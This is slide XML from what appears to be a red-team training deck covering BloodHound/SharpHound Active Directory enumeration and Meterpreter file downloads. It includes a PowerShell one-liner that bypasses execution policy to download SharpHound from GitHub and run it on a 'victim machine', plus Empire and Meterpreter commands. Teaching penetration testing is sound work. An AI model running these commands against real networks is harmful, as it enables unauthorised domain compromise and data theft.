          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&gt;download /path/to/file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA8C5527-F914-46D8-83B8-18D53085DD98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="5644501"/>
            <a:ext cx="4515022" cy="1200329"/>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2400" dirty="0"/>
              <a:t>Download files in Metasploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>From the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> session:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&gt;download /path/to/file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425266707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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586B7C66-F5F4-487B-9FBC-0042D113CF5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="770106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{259F84AC-814E-44E9-A16C-5C73AE54264F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="129412" y="1315333"/>
            <a:ext cx="11340344" cy="4964174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On a victim machine:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> -exec bypass -c "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Net.Webclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>downloadstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>('https://raw.githubusercontent.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>BloodHoundAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/master/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Ingestors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/SharpHound.ps1'); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SearchForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Or in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Empire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>usemodule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>situational_awareness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/network/bloodhound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&gt;execute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C66EC4E3-0016-4F1B-B54F-7C0E4C2DF4A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191335" y="3370139"/>
            <a:ext cx="6871253" cy="2172528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312271088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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586B7C66-F5F4-487B-9FBC-0042D113CF5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="770106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8149FFB-2DD3-4932-8CA0-060012B5A8E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102984" y="1212717"/>
            <a:ext cx="8288395" cy="2040437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>In the bloodhound interface, on the Kali machine, you will import these files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF49EA3-47BB-4620-BDEC-79230CD94970}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2032780" y="2375142"/>
            <a:ext cx="8513477" cy="4220212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278887790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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD443DD-5887-45ED-B4A2-85592D950014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1967132" y="977040"/>
            <a:ext cx="8479836" cy="4774232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F3AF80-E894-468F-B7BD-7D8ECB64549B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="783358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC6AF68F-5EB5-4F7E-805F-DE38F782460E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2230367" y="5780782"/>
            <a:ext cx="9669194" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You can then run queries to discover the shortest paths to Domain Admin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239052304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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F3AF80-E894-468F-B7BD-7D8ECB64549B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="783358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC6AF68F-5EB5-4F7E-805F-DE38F782460E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6308427" y="2749175"/>
            <a:ext cx="6985542" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What if I’m not on a windows domain machine?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B18D3F94-B3C4-4EF4-BC93-769C3F6E06BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015400" y="1265370"/>
            <a:ext cx="4217782" cy="5224443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10704205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2" name="Rectangle 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C98EEAB8-4C66-433E-ACE1-2C0F68BCE2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8955317" y="627858"/>
            <a:ext cx="2946078" cy="2007323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:alpha val="52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81227E10-7B04-4532-997F-4D608C4B8CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6282894" y="1034971"/>
            <a:ext cx="2330585" cy="5676459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:alpha val="52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4BEB848A-3F78-42C2-B984-C82B48AC4554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4062657" y="1034971"/>
            <a:ext cx="2225308" cy="5676460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:alpha val="52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780C6906-F43A-404D-A30E-9B2C28D7FA95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370338" y="1034971"/>
            <a:ext cx="1555839" cy="5658856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:alpha val="52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4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1582272" y="0"/>
            <a:ext cx="9404723" cy="713064"/>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Big Time Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2F70FD-D8F7-4E32-8150-5383EF3175F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A2AC06-47C4-4E25-AE97-8EBDFDC1A6D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458492" y="949312"/>
            <a:ext cx="1349879" cy="1243381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33555083-91A0-41AF-BB24-C4C19706640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688478" y="3168347"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Cloud 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
